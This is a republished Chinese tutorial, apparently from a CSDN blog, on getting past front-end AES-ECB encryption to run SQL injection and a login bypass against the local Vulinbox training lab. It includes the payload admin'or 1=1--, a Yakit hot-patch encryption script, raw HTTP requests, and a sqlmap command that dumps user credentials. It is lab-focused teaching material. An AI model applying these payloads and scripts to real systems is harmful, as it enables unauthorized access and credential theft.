您的位置:首页 > 健康 > 美食 > 招标网app下载_西安私人网站_论坛推广网站_电商运营多少钱一个月

招标网app下载_西安私人网站_论坛推广网站_电商运营多少钱一个月

2024/12/23 15:35:26 来源:https://blog.csdn.net/weixin_49125123/article/details/144489913  浏览:    关键词:招标网app下载_西安私人网站_论坛推广网站_电商运营多少钱一个月
招标网app下载_西安私人网站_论坛推广网站_电商运营多少钱一个月

本文是高级前端加解密与验签实战的第4篇文章,本系列文章实验靶场为Yakit里自带的Vulinbox靶场,本文讲述的是绕过前端AES加密进行SQL注入和绕过登录。

CryptoJS.AES-被前端加密的SQL注入

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

绕过

SQL注入

前端代码和上文一样,都是通过AES加密请求的数据。

yaklang\common\vulinbox\db.go中可以看到相关后端代码:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

数据库是SQLite类型,username参数是直接拼接查询的,所以存在SQL注入漏洞。

登录绕过

yaklang\common\vulinbox\vul_cryptojs_base.go

密码在第87行被赋值,密码是通过上面的GetUserByUsernameUnsafe获取的

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

输入{"username":"admin","password":"666666"}的SQL语句

select * from vulin_users where username = 'admin';

输入{"username":"admin'or 1=1--","password":"666666"}的SQL语句

select * from vulin_users where username = 'admin'or 1=1--';

相当于:

select * from vulin_users where true;

所以返回结果为表中的所有数据。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

所以用户名随便输,密码输入表中存在的随意一个密码就能登陆成功:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

sqlmap

使用Yakit的MITM 交互式劫持,热加载写上AES加密的代码

encryptData = (packet) => {body = poc.GetHTTPPacketBody(packet)hexKey = "31323334313233343132333431323334"key = codec.DecodeHex(hexKey)~data = codec.AESECBEncrypt(key /*type: []byte*/, body, nil /*type: []byte*/)~data = codec.EncodeBase64(data)body = f`{"data": "${data}","key": "${hexKey}"}`return string(poc.ReplaceBody(packet, body, false))
}
beforeRequest = func(req){return encryptData(req)
}

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

1.txt

POST /crypto/js/lib/aes/ecb/handler/sqli HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json{"username":"admin","password":"admin"}

运行sqlmap

python .\sqlmap.py -r .\1.txt --proxy=http://127.0.0.1:8081 --batch -T vulin_users  -C username,password,role --dump

注入成功

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

CryptoJS.AES-被前端加密的 SQL 注入(Bypass认证)

绕过

这个前端代码与前面的还是一样的,都是AES ECB加密。

后端代码如下,可以看到查询语句在109行,用户名和密码都是直接拼接查询的。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

SQL注入跟上面的操作一样,这里就不演示了,这里直接用热加载绕过登录。

POST /crypto/js/lib/aes/ecb/handler/sqli/bypass HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json{"username":"admin'or 1=1--","password":""}

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com